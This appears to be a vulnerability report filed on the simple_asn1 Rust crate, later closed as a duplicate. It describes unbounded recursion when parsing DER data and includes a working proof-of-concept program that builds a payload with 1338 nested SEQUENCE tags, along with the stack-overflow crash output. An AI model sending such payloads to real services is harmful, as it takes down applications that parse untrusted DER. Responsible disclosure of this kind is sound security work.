Denial of Service via stack exhaustion in deeply nested DER structures

[fasrm]

Summary
simple_asn1 v0.6.4 recursively parses nested DER structures through from_der_() without enforcing a recursion depth limit.

An attacker-controlled DER payload containing deeply nested SEQUENCE (0x30) or SET (0x31) objects can trigger stack exhaustion and abort the process.

In the tested environment, the crash occurs around nesting depth 1338 with a payload size of approximately 5 KB.

PoC
use simple_asn1::from_der;

fn encode_len(len: usize) -> Vec {
if len < 128 {
return vec![len as u8];
}

let mut bytes = Vec::new();
let mut n = len;

while n > 0 {
    bytes.push((n & 0xff) as u8);
    n >>= 8;
}

bytes.reverse();

let mut out = vec![0x80 | (bytes.len() as u8)];
out.extend(bytes);
out

}

fn make_nested(depth: usize, tag: u8) -> Vec {
let mut data = vec![0x05, 0x00];

for _ in 0..depth {
    let mut obj = vec![tag];
    obj.extend(encode_len(data.len()));
    obj.extend(data);
    data = obj;
}

data

}

fn main() {
let payload = make_nested(1338, 0x30);

println!("Payload size: {}", payload.len());

let _ = from_der(&payload);

}

Output
Payload size: 5185

thread 'main' has overflowed its stack
fatal runtime error: stack overflow, aborting
Aborted (core dumped)

Impact
Applications parsing attacker-controlled DER data through simple_asn1::from_der() may be vulnerable to denial of service via stack exhaustion and process abort.

[Flakebi]

Duplicate of #41